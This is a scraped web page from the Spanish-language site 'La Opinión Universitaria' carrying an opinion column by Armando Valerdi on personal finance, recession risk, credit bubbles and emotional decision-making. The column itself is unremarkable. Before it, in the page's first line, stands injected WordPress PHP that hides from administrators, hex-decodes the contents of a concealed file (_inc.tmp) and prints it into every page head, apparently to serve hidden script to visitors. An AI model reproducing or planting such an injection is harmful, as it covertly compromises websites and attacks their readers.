if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } MI OPINIÓN FINANCIERA DE HOY     – La Opinión Universitaria La Opinión Universitaria
Menu

MI OPINIÓN FINANCIERA DE HOY    

 

ARMANDO VALERDI

avalerdir@hotmail.com

Hola que tengas un gran inicio de semana y espero que sigas obteniendo las mejores herramientas para que hagan que tu travesía en este embravecido río del cambio te lleven adonde te has propuesto llegar, y no a donde la corriente te arrastre.

Para seguir analizando el camino de la economía y las finanzas internacionales y como repercuten en nuestra planeación personal, es importante considerar que en el panorama actual no se ve mejora alguna, sino al contrario los signos en este momento tanto en el entorno internacional como en el nacional se ven más complicados.

He mencionado en este espacio la posibilidad de que la economía internacional no solo nos muestre una disminución en el crecimiento, sino que existe la posibilidad de una recesión, lo que significa grandes retos para muchos de los aspectos que tienen que ver con el bienestar de millones de personas que cada vez ven más deteriorados sus salarios, sus ahorros, o el incremento de sus deudas, y con alzas en los precios de muchos productos.

Al respecto, ya muchos analistas e inversionistas ven una crisis severa para los próximos años, recordemos que uno de ellos, Richard Duncan a la crisis del 2008 la denomino “La Nueva Depresión”, debido a que para él lo que el modelo que implosionó en ese año aún no termina de dar su último golpe, debido a que la expansión cuantitativa llevada a cabo por los bancos centrales de Estados Unidos, Europa y Japón, que no es más que la expansión de dinero fiduciario creado a partir de los años setenta, y que lo que lo sustenta es la expansión del consumo a través del crédito, y que prácticamente el crédito ha alcanzado niveles nunca pensados y vistos según algunos datos que nos muestran que en el 2008 al reventar el modelo había casi 700 billones de dólares de derivados en el marcado, en 2018 habían alcanzado la cifra de 1.2 cuatrillones, ¡Sí ¡, esos derivados a los que Warren Buffett calificó como “armas de destrucción masiva”, por lo que se teme que la burbuja de crédito se pinche pronto y que al reventar produzca una crisis muy severa.

En su libro “Esta vez es distinto: ocho siglos de necedad Financiera”, publicado por el Fondo de cultura económica, Carmen M. Reinhart y Kenneth S. Rogoff, nos dicen: “Sin importar cuán distinta pueda parecer una crisis de otra, históricamente es demostrable que cualquier debacle financiera (estatal, bancaria, empresarial o industrial) siempre será ocasionada por la excesiva acumulación de deuda en un momento de aparente crecimiento de la actividad económica”.

Reinhart y Rogoff, advierten que después del estudio y analisis profundo en datos y detalles de las crisis acontecidas durante los últimos ocho siglos que el: “Llamado a invertir, tan común y al mismo tiempo tan costoso, en medio del boom que precede a una crisis financiera se deriva de la percepción de que Esta vez es distinto”, y que no va a pasar nada, porque las crisis son historias del pasado.

Quizás nos preguntemos porque se llega a esa conclusión, y bueno al respecto hay que considerar lo que dice Oriol Amat, “Todas las crisis tienen similitudes; también diferencias significativas. En una situación en la que se mezclan datos económicos complicados con la psicología habitual de la mayoría de personas es posible entender muchas decisiones irracionales de empresas y particulares, provocadas por la euforia en unas fases y por el pánico en otras”.

Creo que es oportuno tomar en cuenta que independientemente de la combinación complicada entre datos económicos y psicológicos, que es muy cierta, también está ausente una educación apropiada en lo referente al uso, manejo y convivencia con las finanzas, sobre todo con su esencia; el dinero, llámese como se llame o se presente en la forma que se presente.

Por lo que respecta a lo mencionado por Oriol Amat en relación al aspecto psicológico, en este espacio he comentado a lo ligadas que están las finanzas con las emociones, que sin duda no es el único ámbito en donde las emociones se presentan, ya que hoy podemos ver los estudios realizados en relación a las decisiones, y como un gran porcentaje de ellas son irracionales, el 85% son consideradas emocionales, aun cuando otros especialistas en neurociencia nos dicen que el 95% de nuestras decisiones parten del subconsciente emocional.

Sin duda independientemente de los datos macroeconómicos de la economía tanto global como local, primero debemos cuidar nuestra economía y finanzas personales, por lo que debemos de tener conciencia de cómo ganar, gastar y usar nuestro dinero, y que es claro que esto significa un reto que nos debe llevar a que primero reflexionemos y analicemos como utilizamos nuestra inteligencia emocional en este tipo de decisiones, y así plantear nuestro futuro en donde no solo pensemos que debemos trabajar siempre, por y para el dinero, sino que el dinero trabaje para nosotros, sobre todo cuando vivimos cambios come el actual en donde nuevos retos y oportunidades se están presentando, por lo que si no estamos conscientes del control y uso de nuestras emociones, será muy difícil o hasta imposible llegar a nuestra meta trazada.

No se te olvide que la riqueza empieza con un estado mental, con un propósito definido y con trabajo, todo esto haciendo lo que te gusta.

 

Gracias  

 

 

  • Tweets recientes